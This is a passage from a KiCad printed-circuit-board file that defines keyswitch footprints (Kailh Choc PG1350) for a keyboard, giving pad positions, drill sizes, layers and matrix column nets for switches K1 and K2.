(fp_line (start -6.9 6.9) (end 6.9 6.9) (layer Eco2.User) (width 0.15))
(fp_line (start 6.9 -6.9) (end -6.9 -6.9) (layer Eco2.User) (width 0.15))
(fp_line (start 6.9 -6.9) (end 6.9 6.9) (layer Eco2.User) (width 0.15))
(fp_line (start -6.9 6.9) (end -6.9 -6.9) (layer Eco2.User) (width 0.15))
(pad "" np_thru_hole circle (at -5.5 0) (size 1.7018 1.7018) (drill 1.7018) (layers *.Cu *.Mask))
(pad "" np_thru_hole circle (at 5.5 0) (size 1.7018 1.7018) (drill 1.7018) (layers *.Cu *.Mask))
(pad "" np_thru_hole circle (at 5.22 -4.2) (size 0.9906 0.9906) (drill 0.9906) (layers *.Cu *.Mask))
(pad 1 thru_hole circle (at 0 5.9) (size 2.032 2.032) (drill 1.27) (layers *.Cu *.Mask)
(net 5 /col4))
(pad 2 thru_hole circle (at -5 3.8) (size 2.032 2.032) (drill 1.27) (layers *.Cu *.Mask)
(net 58 "Net-(D2_4-Pad2)"))
(pad "" np_thru_hole circle (at 0 0) (size 3.429 3.429) (drill 3.429) (layers *.Cu *.Mask))
)
(module switches:Choc_PG1350_MX_Spacing (layer F.Cu) (tedit 5F834A4E) (tstamp 5EDAB11F)
(at 80 66.5)
(descr "Kailh \"Choc\" PG1350 keyswitch")
(tags kailh,choc)
(path /5EEF764A)
(fp_text reference K2_3 (at 0 0) (layer F.SilkS) hide
(effects (font (size 1 1) (thickness 0.15)))
)
(fp_text value KEYSW (at 0 10.5) (layer Cmts.User) hide
(effects (font (size 1 1) (thickness 0.15)))
)
(fp_line (start -9.5 9.5) (end -9.5 -9.5) (layer Eco1.User) (width 0.12))
(fp_line (start 9.5 9.5) (end -9.5 9.5) (layer Eco1.User) (width 0.12))
(fp_line (start 9.5 -9.5) (end 9.5 9.5) (layer Eco1.User) (width 0.12))
(fp_line (start -9.5 -9.5) (end 9.5 -9.5) (layer Eco1.User) (width 0.12))
(fp_line (start -2.6 -3.1) (end 2.6 -3.1) (layer Eco2.User) (width 0.15))
(fp_line (start 2.6 -3.1) (end 2.6 -6.3) (layer Eco2.User) (width 0.15))
(fp_line (start 2.6 -6.3) (end -2.6 -6.3) (layer Eco2.User) (width 0.15))
(fp_line (start -2.6 -3.1) (end -2.6 -6.3) (layer Eco2.User) (width 0.15))
(fp_line (start -6.9 6.9) (end 6.9 6.9) (layer Eco2.User) (width 0.15))
(fp_line (start 6.9 -6.9) (end -6.9 -6.9) (layer Eco2.User) (width 0.15))
(fp_line (start 6.9 -6.9) (end 6.9 6.9) (layer Eco2.User) (width 0.15))
(fp_line (start -6.9 6.9) (end -6.9 -6.9) (layer Eco2.User) (width 0.15))
(pad "" np_thru_hole circle (at -5.5 0) (size 1.7018 1.7018) (drill 1.7018) (layers *.Cu *.Mask))
(pad "" np_thru_hole circle (at 5.5 0) (size 1.7018 1.7018) (drill 1.7018) (layers *.Cu *.Mask))
(pad "" np_thru_hole circle (at 5.22 -4.2) (size 0.9906 0.9906) (drill 0.9906) (layers *.Cu *.Mask))
(pad 1 thru_hole circle (at 0 5.9) (size 2.032 2.032) (drill 1.27) (layers *.Cu *.Mask)
(net 19 /col3))
(pad 2 thru_hole circle (at -5 3.8) (size 2.032 2.032) (drill 1.27) (layers *.Cu *.Mask)
(net 57 "Net-(D2_3-Pad2)"))
(pad "" np_thru_hole circle (at 0 0) (size 3.429 3.429) (drill 3.429) (layers *.Cu *.Mask))
)
(module switches:Choc_PG1350_MX_Spacing (layer F.Cu) (tedit 5F834A4E) (tstamp 5EDCC5CD)
(at 61 61)
(descr "Kailh \"Choc\" PG1350 keyswitch")
(tags kailh,choc)
(path /5EED6065)
(fp_text reference K2_2 (at 0 0) (layer F.SilkS) hide
(effects (font (size 1 1) (thickness 0.15)))
)
(fp_text value KEYSW (at 0 10.5) (layer Cmts.User) hide
(effects (font (size 1 1) (thickness 0.15)))
)
(fp_line (start -9.5 9.5) (end -9.5 -9.5) (layer Eco1.User) (width 0.12))
(fp_line (start 9.5 9.5) (end -9.5 9.5) (layer Eco1.User) (width 0.12))
(fp_line (start 9.5 -9.5) (end 9.5 9.5) (layer Eco1.User) (width 0.12))
(fp_line (start -9.5 -9.5) (end 9.5 -9.5) (layer Eco1.User) (width 0.12))
(fp_line (start -2.6 -3.1) (end 2.6 -3.1) (layer Eco2.User) (width 0.15))
(fp_line (start 2.6 -3.1) (end 2.6 -6.3) (layer Eco2.User) (width 0.15))
(fp_line (start 2.6 -6.3) (end -2.6 -6.3) (layer Eco2.User) (width 0.15))
(fp_line (start -2.6 -3.1) (end -2.6 -6.3) (layer Eco2.User) (width 0.15))
(fp_line (start -6.9 6.9) (end 6.9 6.9) (layer Eco2.User) (width 0.15))
(fp_line (start 6.9 -6.9) (end -6.9 -6.9) (layer Eco2.User) (width 0.15))
(fp_line (start 6.9 -6.9) (end 6.9 6.9) (layer Eco2.User) (width 0.15))
(fp_line (start -6.9 6.9) (end -6.9 -6.9) (layer Eco2.User) (width 0.15))
(pad "" np_thru_hole circle (at -5.5 0) (size 1.7018 1.7018) (drill 1.7018) (layers *.Cu *.Mask))
(pad "" np_thru_hole circle (at 5.5 0) (size 1.7018 1.7018) (drill 1.7018) (layers *.Cu *.Mask))
(pad "" np_thru_hole circle (at 5.22 -4.2) (size 0.9906 0.9906) (drill 0.9906) (layers *.Cu *.Mask))
(pad 1 thru_hole circle (at 0 5.9) (size 2.032 2.032) (drill 1.27) (layers *.Cu *.Mask)
(net 17 /col2))
(pad 2 thru_hole circle (at -5 3.8) (size 2.032 2.032) (drill 1.27) (layers *.Cu *.Mask)
(net 56 "Net-(D2_2-Pad2)"))
(pad "" np_thru_hole circle (at 0 0) (size 3.429 3.429) (drill 3.429) (layers *.Cu *.Mask))
)
(module switches:Choc_PG1350_MX_Spacing (layer F.Cu) (tedit 5F834A4E) (tstamp 5EDABA4C)
(at 42 67)
(descr "Kailh \"Choc\" PG1350 keyswitch")
(tags kailh,choc)
(path /5EED5B60)
(fp_text reference K2_1 (at 0 0) (layer F.SilkS) hide
(effects (font (size 1 1) (thickness 0.15)))
)
(fp_text value KEYSW (at 0 10.5) (layer Cmts.User) hide
(effects (font (size 1 1) (thickness 0.15)))
)
(fp_line (start -9.5 9.5) (end -9.5 -9.5) (layer Eco1.User) (width 0.12))
(fp_line (start 9.5 9.5) (end -9.5 9.5) (layer Eco1.User) (width 0.12))
(fp_line (start 9.5 -9.5) (end 9.5 9.5) (layer Eco1.User) (width 0.12))
(fp_line (start -9.5 -9.5) (end 9.5 -9.5) (layer Eco1.User) (width 0.12))
(fp_line (start -2.6 -3.1) (end 2.6 -3.1) (layer Eco2.User) (width 0.15))
(fp_line (start 2.6 -3.1) (end 2.6 -6.3) (layer Eco2.User) (width 0.15))
(fp_line (start 2.6 -6.3) (end -2.6 -6.3) (layer Eco2.User) (width 0.15))
(fp_line (start -2.6 -3.1) (end -2.6 -6.3) (layer Eco2.User) (width 0.15))
(fp_line (start -6.9 6.9) (end 6.9 6.9) (layer Eco2.User) (width 0.15))
(fp_line (start 6.9 -6.9) (end -6.9 -6.9) (layer Eco2.User) (width 0.15))
(fp_line (start 6.9 -6.9) (end 6.9 6.9) (layer Eco2.User) (width 0.15))
(fp_line (start -6.9 6.9) (end -6.9 -6.9) (layer Eco2.User) (width 0.15))
(pad "" np_thru_hole circle (at -5.5 0) (size 1.7018 1.7018) (drill 1.7018) (layers *.Cu *.Mask))
(pad "" np_thru_hole circle (at 5.5 0) (size 1.7018 1.7018) (drill 1.7018) (layers *.Cu *.Mask))
(pad "" np_thru_hole circle (at 5.22 -4.2) (size 0.9906 0.9906) (drill 0.9906) (layers *.Cu *.Mask))
(pad 1 thru_hole circle (at 0 5.9) (size 2.032 2.032) (drill 1.27) (layers *.Cu *.Mask)
(net 18 /col1))
(pad 2 thru_hole circle (at -5 3.8) (size 2.032 2.032) (drill 1.27) (layers *.Cu *.Mask)
(net 55 "Net-(D2_1-Pad2)"))
(pad "" np_thru_hole circle (at 0 0) (size 3.429 3.429) (drill 3.429) (layers *.Cu *.Mask))
)
(module switches:Choc_PG1350_MX_Spacing (layer F.Cu) (tedit 5F834A4E) (tstamp 5EDAAED6)
(at 23 79)
(descr "Kailh \"Choc\" PG1350 keyswitch")
(tags kailh,choc)
(path /5EED2FA2)
(fp_text reference K2_0 (at 0 0) (layer F.SilkS) hide
(effects (font (size 1 1) (thickness 0.15)))
)
(fp_text value KEYSW (at 0 10.5) (layer Cmts.User) hide
(effects (font (size 1 1) (thickness 0.15)))
)
(fp_line (start -9.5 9.5) (end -9.5 -9.5) (layer Eco1.User) (width 0.12))
(fp_line (start 9.5 9.5) (end -9.5 9.5) (layer Eco1.User) (width 0.12))
(fp_line (start 9.5 -9.5) (end 9.5 9.5) (layer Eco1.User) (width 0.12))
(fp_line (start -9.5 -9.5) (end 9.5 -9.5) (layer Eco1.User) (width 0.12))
(fp_line (start -2.6 -3.1) (end 2.6 -3.1) (layer Eco2.User) (width 0.15))
(fp_line (start 2.6 -3.1) (end 2.6 -6.3) (layer Eco2.User) (width 0.15))
(fp_line (start 2.6 -6.3) (end -2.6 -6.3) (layer Eco2.User) (width 0.15))
(fp_line (start -2.6 -3.1) (end -2.6 -6.3) (layer Eco2.User) (width 0.15))
(fp_line (start -6.9 6.9) (end 6.9 6.9) (layer Eco2.User) (width 0.15))
(fp_line (start 6.9 -6.9) (end -6.9 -6.9) (layer Eco2.User) (width 0.15))
(fp_line (start 6.9 -6.9) (end 6.9 6.9) (layer Eco2.User) (width 0.15))
(fp_line (start -6.9 6.9) (end -6.9 -6.9) (layer Eco2.User) (width 0.15))
(pad "" np_thru_hole circle (at -5.5 0) (size 1.7018 1.7018) (drill 1.7018) (layers *.Cu *.Mask))
(pad "" np_thru_hole circle (at 5.5 0) (size 1.7018 1.7018) (drill 1.7018) (layers *.Cu *.Mask))
(pad "" np_thru_hole circle (at 5.22 -4.2) (size 0.9906 0.9906) (drill 0.9906) (layers *.Cu *.Mask))
(pad 1 thru_hole circle (at 0 5.9) (size 2.032 2.032) (drill 1.27) (layers *.Cu *.Mask)
(net 14 /col0))
(pad 2 thru_hole circle (at -5 3.8) (size 2.032 2.032) (drill 1.27) (layers *.Cu *.Mask)
(net 54 "Net-(D2_0-Pad2)"))
(pad "" np_thru_hole circle (at 0 0) (size 3.429 3.429) (drill 3.429) (layers *.Cu *.Mask))
)
(module switches:Choc_PG1350_MX_Spacing (layer F.Cu) (tedit 5F834A4E) (tstamp 5ECCC005)
(at 229 60)
(descr "Kailh \"Choc\" PG1350 keyswitch")
(tags kailh,choc)
(path /5FD3AEE2)
(fp_text reference K1_9 (at 0 0) (layer F.SilkS) hide
(effects (font (size 1 1) (thickness 0.15)))
)
(fp_text value KEYSW (at 0 10.5) (layer Cmts.User) hide
(effects (font (size 1 1) (thickness 0.15)))
)
(fp_line (start -9.5 9.5) (end -9.5 -9.5) (layer Eco1.User) (width 0.12))
(fp_line (start 9.5 9.5) (end -9.5 9.5) (layer Eco1.User) (width 0.12))
(fp_line (start 9.5 -9.5) (end 9.5 9.5) (layer Eco1.User) (width 0.12))
(fp_line (start -9.5 -9.5) (end 9.5 -9.5) (layer Eco1.User) (width 0.12))
(fp_line (start -2.6 -3.1) (end 2.6 -3.1) (layer Eco2.User) (width 0.15))
(fp_line (start 2.6 -3.1) (end 2.6 -6.3) (layer Eco2.User) (width 0.15))
(fp_line (start 2.6 -6.3) (end -2.6 -6.3) (layer Eco2.User) (width 0.15))
(fp_line (start -2.6 -3.1) (end -2.6 -6.3) (layer Eco2.User) (width 0.15))
(fp_line (start -6.9 6.9) (end 6.9 6.9) (layer Eco2.User) (width 0.15))
(fp_line (start 6.9 -6.9) (end -6.9 -6.9) (layer Eco2.User) (width 0.15))
(fp_line (start 6.9 -6.9) (end 6.9 6.9) (layer Eco2.User) (width 0.15))
(fp_line (start -6.9 6.9) (end -6.9 -6.9) (layer Eco2.User) (width 0.15))
(pad "" np_thru_hole circle (at -5.5 0) (size 1.7018 1.7018) (drill 1.7018) (layers *.Cu *.Mask))
(pad "" np_thru_hole circle (at 5.5 0) (size 1.7018 1.7018) (drill 1.7018) (layers *.Cu *.Mask))
(pad "" np_thru_hole circle (at 5.22 -4.2) (size 0.9906 0.9906) (drill 0.9906) (layers *.Cu *.Mask))
(pad 1 thru_hole circle (at 0 5.9) (size 2.032 2.032) (drill 1.27) (layers *.Cu *.Mask)
(net 24 /col9))
(pad 2 thru_hole circle (at -5 3.8) (size 2.032 2.032) (drill 1.27) (layers *.Cu *.Mask)
(net 53 "Net-(D1_9-Pad2)"))
(pad "" np_thru_hole circle (at 0 0) (size 3.429 3.429) (drill 3.429) (layers *.Cu *.Mask))
)
(module switches:Choc_PG1350_MX_Spacing (layer F.Cu) (tedit 5F834A4E) (tstamp 5ECCC043)
(at 210 48)
(descr "Kailh \"Choc\" PG1350 keyswitch")
(tags kailh,choc)
(path /5FD3AE9C)
(fp_text reference K1_8 (at 0 0) (layer F.SilkS) hide
(effects (font (size 1 1) (thickness 0.15)))
)
(fp_text value KEYSW (at 0 10.5) (layer Cmts.User) hide
(effects (font (size 1 1) (thickness 0.15)))
)
(fp_line (start -9.5 9.5) (end -9.5 -9.5) (layer Eco1.User) (width 0.12))
(fp_line (start 9.5 9.5) (end -9.5 9.5) (layer Eco1.User) (width 0.12))
(fp_line (start 9.5 -9.5) (end 9.5 9.5) (layer Eco1.User) (width 0.12))
(fp_line (start -9.5 -9.5) (end 9.5 -9.5) (layer Eco1.User) (width 0.12))
(fp_line (start -2.6 -3.1) (end 2.6 -3.1) (layer Eco2.User) (width 0.15))
(fp_line (start 2.6 -3.1) (end 2.6 -6.3) (layer Eco2.User) (width 0.15))
(fp_line (start 2.6 -6.3) (end -2.6 -6.3) (layer Eco2.User) (width 0.15))
(fp_line (start -2.6 -3.1) (end -2.6 -6.3) (layer Eco2.User) (width 0.15))
(fp_line (start -6.9 6.9) (end 6.9 6.9) (layer Eco2.User) (width 0.15))
(fp_line (start 6.9 -6.9) (end -6.9 -6.9) (layer Eco2.User) (width 0.15))
(fp_line (start 6.9 -6.9) (end 6.9 6.9) (layer Eco2.User) (width 0.15))
(fp_line (start -6.9 6.9) (end -6.9 -6.9) (layer Eco2.User) (width 0.15))
(pad "" np_thru_hole circle (at -5.5 0) (size 1.7018 1.7018) (drill 1.7018) (layers *.Cu *.Mask))
(pad "" np_thru_hole circle (at 5.5 0) (size 1.7018 1.7018) (drill 1.7018) (layers *.Cu *.Mask))
(pad "" np_thru_hole circle (at 5.22 -4.2) (size 0.9906 0.9906) (drill 0.9906) (layers *.Cu *.Mask))
(pad 1 thru_hole circle (at 0 5.9) (size 2.032 2.032) (drill 1.27) (layers *.Cu *.Mask)
(net 15 /col8))
(pad 2 thru_hole circle (at -5 3.8) (size 2.032 2.032) (drill 1.27) (layers *.Cu *.Mask)
(net 52 "Net-(D1_8-Pad2)"))
(pad "" np_thru_hole circle (at 0 0) (size 3.429 3.429) (drill 3.429) (layers *.Cu *.Mask))
)
(module switches:Choc_PG1350_MX_Spacing (layer F.Cu) (tedit 5F834A4E) (tstamp 5ECCC0A0)
(at 191 42)
(descr "Kailh \"Choc\" PG1350 keyswitch")
(tags kailh,choc)
(path /5FD3AE31)
(fp_text reference K1_7 (at 0 0) (layer F.SilkS) hide
(effects (font (size 1 1) (thickness 0.15)))
)
(fp_text value KEYSW (at 0 10.5) (layer Cmts.User) hide
(effects (font (size 1 1) (thickness 0.15)))
)
(fp_line (start -9.5 9.5) (end -9.5 -9.5) (layer Eco1.User) (width 0.12))
(fp_line (start 9.5 9.5) (end -9.5 9.5) (layer Eco1.User) (width 0.12))
(fp_line (start 9.5 -9.5) (end 9.5 9.5) (layer Eco1.User) (width 0.12))
(fp_line (start -9.5 -9.5) (end 9.5 -9.5) (layer Eco1.User) (width 0.12))
(fp_line (start -2.6 -3.1) (end 2.6 -3.1) (layer Eco2.User) (width 0.15))
(fp_line (start 2.6 -3.1) (end 2.6 -6.3) (layer Eco2.User) (width 0.15))
(fp_line (start 2.6 -6.3) (end -2.6 -6.3) (layer Eco2.User) (width 0.15))
(fp_line (start -2.6 -3.1) (end -2.6 -6.3) (layer Eco2.User) (width 0.15))
(fp_line (start -6.9 6.9) (end 6.9 6.9) (layer Eco2.User) (width 0.15))
(fp_line (start 6.9 -6.9) (end -6.9 -6.9) (layer Eco2.User) (width 0.15))
(fp_line (start 6.9 -6.9) (end 6.9 6.9) (layer Eco2.User) (width 0.15))
(fp_line (start -6.9 6.9) (end -6.9 -6.9) (layer Eco2.User) (width 0.15))
(pad "" np_thru_hole circle (at -5.5 0) (size 1.7018 1.7018) (drill 1.7018) (layers *.Cu *.Mask))
(pad "" np_thru_hole circle (at 5.5 0) (size 1.7018 1.7018) (drill 1.7018) (layers *.Cu *.Mask))
(pad "" np_thru_hole circle (at 5.22 -4.2) (size 0.9906 0.9906) (drill 0.9906) (layers *.Cu *.Mask))
(pad 1 thru_hole circle (at 0 5.9) (size 2.032 2.032) (drill 1.27) (layers *.Cu *.Mask)
(net 21 /col7))
(pad 2 thru_hole circle (at -5 3.8) (size 2.032 2.032) (drill 1.27) (layers *.Cu *.Mask)
(net 51 "Net-(D1_7-Pad2)"))
(pad "" np_thru_hole circle (at 0 0) (size 3.429 3.429) (drill 3.429) (layers *.Cu *.Mask))
)
(module switches:Choc_PG1350_MX_Spacing (layer F.Cu) (tedit 5F834A4E) (tstamp 5ECCC0BF)
(at 172 47.5)
(descr "Kailh \"Choc\" PG1350 keyswitch")
(tags kailh,choc)
(path /5FD3AE02)
(fp_text reference K1_6 (at 0 0) (layer F.SilkS) hide
(effects (font (size 1 1) (thickness 0.15)))
)
(fp_text value KEYSW (at 0 10.5) (layer Cmts.User) hide
(effects (font (size 1 1) (thickness 0.15)))
)
(fp_line (start -9.5 9.5) (end -9.5 -9.5) (layer Eco1.User) (width 0.12))
(fp_line (start 9.5 9.5) (end -9.5 9.5) (layer Eco1.User) (width 0.12))
(fp_line (start 9.5 -9.5) (end 9.5 9.5) (layer Eco1.User) (width 0.12))
(fp_line (start -9.5 -9.5) (end 9.5 -9.5) (layer Eco1.User) (width 0.12))
(fp_line (start -2.6 -3.1) (end 2.6 -3.1) (layer Eco2.User) (width 0.15))
(fp_line (start 2.6 -3.1) (end 2.6 -6.3) (layer Eco2.User) (width 0.15))
(fp_line (start 2.6 -6.3) (end -2.6 -6.3) (layer Eco2.User) (width 0.15))
(fp_line (start -2.6 -3.1) (end -2.6 -6.3) (layer Eco2.User) (width 0.15))
(fp_line (start -6.9 6.9) (end 6.9 6.9) (layer Eco2.User) (width 0.15))
(fp_line (start 6.9 -6.9) (end -6.9 -6.9) (layer Eco2.User) (width 0.15))
(fp_line (start 6.9 -6.9) (end 6.9 6.9) (layer Eco2.User) (width 0.15))
(fp_line (start -6.9 6.9) (end -6.9 -6.9) (layer Eco2.User) (width 0.15))
(pad "" np_thru_hole circle (at -5.5 0) (size 1.7018 1.7018) (drill 1.7018) (layers *.Cu *.Mask))
(pad "" np_thru_hole circle (at 5.5 0) (size 1.7018 1.7018) (drill 1.7018) (layers *.Cu *.Mask))
(pad "" np_thru_hole circle (at 5.22 -4.2) (size 0.9906 0.9906) (drill 0.9906) (layers *.Cu *.Mask))
(pad 1 thru_hole circle (at 0 5.9) (size 2.032 2.032) (drill 1.27) (layers *.Cu *.Mask)
(net 20 /col6))
(pad 2 thru_hole circle (at -5 3.8) (size 2.032 2.032) (drill 1.27) (layers *.Cu *.Mask)
(net 50 "Net-(D1_6-Pad2)"))
(pad "" np_thru_hole circle (at 0 0) (size 3.429 3.429) (drill 3.429) (layers *.Cu *.Mask))
)
(module switches:Choc_PG1350_MX_Spacing (layer F.Cu) (tedit 5F834A4E) (tstamp 5ECCC0DE)
(at 153 50)
(descr "Kailh \"Choc\" PG1350 keyswitch")
(tags kailh,choc)
(path /5FD3ADD3)
(fp_text reference K1_5 (at 0 0) (layer F.SilkS) hide
(effects (font (size 1 1) (thickness 0.15)))
)
(fp_text value KEYSW (at 0 10.5) (layer Cmts.User) hide
(effects (font (size 1 1) (thickness 0.15)))
)
(fp_line (start -9.5 9.5) (end -9.5 -9.5) (layer Eco1.User) (width 0.12))
(fp_line (start 9.5 9.5) (end -9.5 9.5) (layer Eco1.User) (width 0.12))
(fp_line (start 9.5 -9.5) (end 9.5 9.5) (layer Eco1.User) (width 0.12))
(fp_line (start -9.5 -9.5) (end 9.5 -9.5) (layer Eco1.User) (width 0.12))
(fp_line (start -2.6 -3.1) (end 2.6 -3.1) (layer Eco2.User) (width 0.15))
(fp_line (start 2.6 -3.1) (end 2.6 -6.3) (layer Eco2.User) (width 0.15))
(fp_line (start 2.6 -6.3) (end -2.6 -6.3) (layer Eco2.User) (width 0.15))
(fp_line (start -2.6 -3.1) (end -2.6 -6.3) (layer Eco2.User) (width 0.15))
(fp_line (start -6.9 6.9) (end 6.9 6.9) (layer Eco2.User) (width 0.15))
(fp_line (start 6.9 -6.9) (end -6.9 -6.9) (layer Eco2.User) (width 0.15))
(fp_line (start 6.9 -6.9) (end 6.9 6.9) (layer Eco2.User) (width 0.15))
(fp_line (start -6.9 6.9) (end -6.9 -6.9) (layer Eco2.User) (width 0.15))
(pad "" np_thru_hole circle (at -5.5 0) (size 1.7018 1.7018) (drill 1.7018) (layers *.Cu *.Mask))
(pad "" np_thru_hole circle (at 5.5 0) (size 1.7018 1.7018) (drill 1.7018) (layers *.Cu *.Mask))
(pad "" np_thru_hole circle (at 5.22 -4.2) (size 0.9906 0.9906) (drill 0.9906) (layers *.Cu *.Mask))
(pad 1 thru_hole circle (at 0 5.9) (size 2.032 2.032) (drill 1.27) (layers *.Cu *.Mask)
(net 16 /col5))
(pad 2 thru_hole circle (at -5 3.8) (size 2.032 2.032) (drill 1.27) (layers *.Cu *.Mask)
(net 49 "Net-(D1_5-Pad2)"))
(pad "" np_thru_hole circle (at 0 0) (size 3.429 3.429) (drill 3.429) (layers *.Cu *.Mask))
)
(module switches:Choc_PG1350_MX_Spacing (layer F.Cu) (tedit 5F834A4E) (tstamp 5EDABBD5)
(at 99 50)
(descr "Kailh \"Choc\" PG1350 keyswitch")
(tags kailh,choc)
(path /5EEFA968)
(fp_text reference K1_4 (at 0 0) (layer F.SilkS) hide
(effects (font (size 1 1) (thickness 0.15)))
)
(fp_text value KEYSW (at 0 10.5) (layer Cmts.User) hide
(effects (font (size 1 1) (thickness 0.15)))
)
(fp_line (start -9.5 9.5) (end -9.5 -9.5) (layer Eco1.User) (width 0.12))
(fp_line (start 9.5 9.5) (end -9.5 9.5) (layer Eco1.User) (width 0.12))
(fp_line (start 9.5 -9.5) (end 9.5 9.5) (layer Eco1.User) (width 0.12))
(fp_line (start -9.5 -9.5) (end 9.5 -9.5) (layer Eco1.User) (width 0.12))
(fp_line (start -2.6 -3.1) (end 2.6 -3.1) (layer Eco2.User) (width 0.15))
(fp_line (start 2.6 -3.1) (end 2.6 -6.3) (layer Eco2.User) (width 0.15))
(fp_line (start 2.6 -6.3) (end -2.6 -6.3) (layer Eco2.User) (width 0.15))
(fp_line (start -2.6 -3.1) (end -2.6 -6.3) (layer Eco2.User) (width 0.15))
(fp_line (start -6.9 6.9) (end 6.9 6.9) (layer Eco2.User) (width 0.15))
(fp_line (start 6.9 -6.9) (end -6.9 -6.9) (layer Eco2.User) (width 0.15))
(fp_line (start 6.9 -6.9) (end 6.9 6.9) (layer Eco2.User) (width 0.15))
(fp_line (start -6.9 6.9) (end -6.9 -6.9) (layer Eco2.User) (width 0.15))
(pad "" np_thru_hole circle (at -5.5 0) (size 1.7018 1.7018) (drill 1.7018) (layers *.Cu *.Mask))
(pad "" np_thru_hole circle (at 5.5 0) (size 1.7018 1.7018) (drill 1.7018) (layers *.Cu *.Mask))
(pad "" np_thru_hole circle (at 5.22 -4.2) (size 0.9906 0.9906) (drill 0.9906) (layers *.Cu *.Mask))
(pad 1 thru_hole circle (at 0 5.9) (size 2.032 2.032) (drill 1.27) (layers *.Cu *.Mask)
(net 5 /col4))
(pad 2 thru_hole circle (at -5 3.8) (size 2.032 2.032) (drill 1.27) (layers *.Cu *.Mask)
(net 48 "Net-(D1_4-Pad2)"))
(pad "" np_thru_hole circle (at 0 0) (size 3.429 3.429) (drill 3.429) (layers *.Cu *.Mask))
)
(module switches:Choc_PG1350_MX_Spacing (layer F.Cu) (tedit 5F834A4E) (tstamp 5EDAA810)
(at 80 47.5)
(descr "Kailh \"Choc\" PG1350 keyswitch")
(tags kailh,choc)
(path /5EEF70F9)
(fp_text reference K1_3 (at 0 0) (layer F.SilkS) hide
(effects (font (size 1 1) (thickness 0.15)))
)
(fp_text value KEYSW (at 0 10.5) (layer Cmts.User) hide
(effects (font (size 1 1) (thickness 0.15)))
)
(fp_line (start -9.5 9.5) (end -9.5 -9.5) (layer Eco1.User) (width 0.12))
(fp_line (start 9.5 9.5) (end -9.5 9.5) (layer Eco1.User) (width 0.12))
(fp_line (start 9.5 -9.5) (end 9.5 9.5) (layer Eco1.User) (width 0.12))
(fp_line (start -9.5 -9.5) (end 9.5 -9.5) (layer Eco1.User) (width 0.12))
(fp_line (start -2.6 -3.1) (end 2.6 -3.1) (layer Eco2.User) (width 0.15))
(fp_line (start 2.6 -3.1) (end 2.6 -6.3) (layer Eco2.User) (width 0.15))
(fp_line (start 2.6 -6.3) (end -2.6 -6.3) (layer Eco2.User) (width 0.15))
(fp_line (start -2.6 -3.1) (end -2.6 -6.3) (layer Eco2.User) (width 0.15))
(fp_line (start -6.9 6.9) (end 6.9 6.9) (layer Eco2.User) (width 0.15))
(fp_line (start 6.9 -6.9) (end -6.9 -6.9) (layer Eco2.User) (width 0.15))
(fp_line (start 6.9 -6.9) (end 6.9 6.9) (layer Eco2.User) (width 0.15))
(fp_line (start -6.9 6.9) (end -6.9 -6.9) (layer Eco2.User) (width 0.15))
(pad "" np_thru_hole circle (at -5.5 0) (size 1.7018 1.7018) (drill 1.7018) (layers *.Cu *.Mask))
(pad "" np_thru_hole circle (at 5.5 0) (size 1.7018 1.7018) (drill 1.7018) (layers *.Cu *.Mask))
(pad "" np_thru_hole circle (at 5.22 -4.2) (size 0.9906 0.9906) (drill 0.9906) (layers *.Cu *.Mask))
(pad 1 thru_hole circle (at 0 5.9) (size 2.032 2.032) (drill 1.27) (layers *.Cu *.Mask)
(net 19 /col3))
(pad 2 thru_hole circle (at -5 3.8) (size 2.032 2.032) (drill 1.27) (layers *.Cu *.Mask)
(net 47 "Net-(D1_3-Pad2)"))
(pad "" np_thru_hole circle (at 0 0) (size 3.429 3.429) (drill 3.429) (layers *.Cu *.Mask))
)
(module switches:Choc_PG1350_MX_Spacing (layer F.Cu) (tedit 5F834A4E) (tstamp 5EDAB8F9)
(at 61 42)
(descr "Kailh \"Choc\" PG1350 keyswitch")
(tags kailh,choc)
(path /5EECD1C4)
(fp_text reference K1_2 (at 0 0) (layer F.SilkS) hide
(effects (font (size 1 1) (thickness 0.15)))
)
(fp_text value KEYSW (at 0 10.5) (layer Cmts.User) hide
(effects (font (size 1 1) (thickness 0.15)))
)
(fp_line (start -9.5 9.5) (end -9.5 -9.5) (layer Eco1.User) (width 0.12))
(fp_line (start 9.5 9.5) (end -9.5 9.5) (layer Eco1.User) (width 0.12))
(fp_line (start 9.5 -9.5) (end 9.5 9.5) (layer Eco1.User) (width 0.12))
(fp_line (start -9.5 -9.5) (end 9.5 -9.5) (layer Eco1.User) (width 0.12))
(fp_line (start -2.6 -3.1) (end 2.6 -3.1) (layer Eco2.User) (width 0.15))
(fp_line (start 2.6 -3.1) (end 2.6 -6.3) (layer Eco2.User) (width 0.15))
(fp_line (start 2.6 -6.3) (end -2.6 -6.3) (layer Eco2.User) (width 0.15))
(fp_line (start -2.6 -3.1) (end -2.6 -6.3) (layer Eco2.User) (width 0.15))
(fp_line (start -6.9 6.9) (end 6.9 6.9) (layer Eco2.User) (width 0.15))
(fp_line (start 6.9 -6.9) (end -6.9 -6.9) (layer Eco2.User) (width 0.15))
(fp_line (start 6.9 -6.9) (end 6.9 6.9) (layer Eco2.User) (width 0.15))
(fp_line (start -6.9 6.9) (end -6.9 -6.9) (layer Eco2.User) (width 0.15))
(pad "" np_thru_hole circle (at -5.5 0) (size 1.7018 1.7018) (drill 1.7018) (layers *.Cu *.Mask))
(pad "" np_thru_hole circle (at 5.5 0) (size 1.7018 1.7018) (drill 1.7018) (layers *.Cu *.Mask))
(pad "" np_thru_hole circle (at 5.22 -4.2) (size 0.9906 0.9906) (drill 0.9906) (layers *.Cu *.Mask))
(pad 1 thru_hole circle (at 0 5.9) (size 2.032 2.032) (drill 1.27) (layers *.Cu *.Mask)
(net 17 /col2))
(pad 2 thru_hole circle (at -5 3.8) (size 2.032 2.032) (drill 1.27) (layers *.Cu *.Mask)
(net 46 "Net-(D1_2-Pad2)"))
(pad "" np_thru_hole circle (at 0 0) (size 3.429 3.429) (drill 3.429) (layers *.Cu *.Mask))
)
(module switches:Choc_PG1350_MX_Spacing (layer F.Cu) (tedit 5F834A4E) (tstamp 5EDAB836)
(at 42 48)
(descr "Kailh \"Choc\" PG1350 keyswitch")
(tags kailh,choc)
(path /5EE47E8A)
(fp_text reference K1_1 (at 0 0) (layer F.SilkS) hide
(effects (font (size 1 1) (thickness 0.15)))
)
(fp_text value KEYSW (at 0 10.5) (layer Cmts.User) hide
(effects (font (size 1 1) (thickness 0.15)))
)
(fp_line (start -9.5 9.5) (end -9.5 -9.5) (layer Eco1.User) (width 0.12))
(fp_line (start 9.5 9.5) (end -9.5 9.5) (layer Eco1.User) (width 0.12))
(fp_line (start 9.5 -9.5) (end 9.5 9.5) (layer Eco1.User) (width 0.12))
